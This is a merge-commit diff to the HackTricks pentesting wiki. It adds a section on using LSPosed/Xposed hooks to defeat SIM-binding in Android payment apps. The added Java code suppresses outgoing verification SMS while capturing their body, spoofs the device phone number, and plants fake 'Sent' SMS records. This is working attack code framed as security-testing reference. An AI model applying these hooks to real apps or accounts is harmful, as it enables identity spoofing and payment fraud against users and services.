Merge pull request #2026 from HackTricks-wiki/update_Weaponizing_LSPosed__Remote_SMS_Injection_and_Iden_20260319_130130

carlospolop · web-flow · commit 387defdeebd8 · 2026-03-31T13:01:59.000+02:00
Weaponizing LSPosed Remote SMS Injection and Identity Spoofi...
diff --git a/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md b/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
@@ -355,6 +355,69 @@ apk-mitm app.apk
   install-burp-certificate.md
   {{#endref}}
 
+
+## LSPosed/Xposed Hooking Abuse (Telephony/SMS)
+
+On rooted devices, LSPosed/Xposed modules can hook Java telephony/SMS APIs at runtime, keeping the APK unmodified on disk while fully controlling what the app sees. This is commonly abused to bypass SIM‑binding flows that trust local telephony APIs or local SMS provider state.
+
+Key primitives
+- **Suppress outgoing verification SMS** while exfiltrating the token by short‑circuiting `SmsManager.sendTextMessage` in `beforeHookedMethod`.
+- **Spoof MSISDN/line number** by forcing `TelephonyManager.getLine1Number()` and `SubscriptionInfo.getNumber()` to return an attacker‑controlled value.
+- **Plant a fake “Sent” record** in the SMS provider so apps that check local SMS history see a successful send even if the carrier never received it.
+
+Example: block SMS dispatch and capture content
+```java
+XposedHelpers.findAndHookMethod(
+  "android.telephony.SmsManager",
+  lpparam.classLoader,
+  "sendTextMessage",
+  String.class, String.class, String.class, PendingIntent.class, PendingIntent.class,
+  new XC_MethodHook() {
+    protected void beforeHookedMethod(MethodHookParam param) {
+      String body = (String) param.args[2];
+      // exfiltrate body to operator channel
+      param.setResult(null); // suppress real SMS send
+    }
+  }
+);
+```
+
+Example: spoof device phone number
+```java
+XposedHelpers.findAndHookMethod(
+  "android.telephony.TelephonyManager",
+  lpparam.classLoader,
+  "getLine1Number",
+  new XC_MethodHook() {
+    protected void afterHookedMethod(MethodHookParam param) {
+      param.setResult(spoofedMsisdn);
+    }
+  }
+);
+```
+```java
+XposedHelpers.findAndHookMethod(
+  "android.telephony.SubscriptionInfo",
+  lpparam.classLoader,
+  "getNumber",
+  new XC_MethodHook() {
+    protected void afterHookedMethod(MethodHookParam param) {
+      param.setResult(spoofedMsisdn);
+    }
+  }
+);
+```
+
+Example: inject a fake “Sent” SMS record
+```java
+ContentValues v = new ContentValues();
+v.put("address", dest);
+v.put("body", body);
+v.put("type", 2);   // sent
+v.put("status", 0); // success
+context.getContentResolver().insert(Uri.parse("content://sms/sent"), v);
+```
+
 ## Handy command cheat‑sheet
 
 ```bash
@@ -418,5 +481,5 @@ Notes
 - [phantom-frida (stealth Frida server builder)](https://github.com/TheQmaks/phantom-frida)
 - [Frida OkHttp4 SSL pinning bypass script](https://github.com/Zero3141/Frida-OkHttp-Bypass)
 - [XDA guide to strong Play Integrity bypass (2025)](https://xdaforums.com/t/updated-11-17-2025-guide-get-strong-integrity-fix-banking-apps-revolut-google-wallet-android-16-working.4753805/)
-
+- [Weaponizing LSPosed: Remote SMS Injection and Identity Spoofing in Modern Payment Ecosystems](https://www.cloudsek.com/blog/weaponizing-lsposed-remote-sms-injection-and-identity-spoofing-in-modern-payment-ecosystems-2)
 {{#include ../../banners/hacktricks-training.md}}
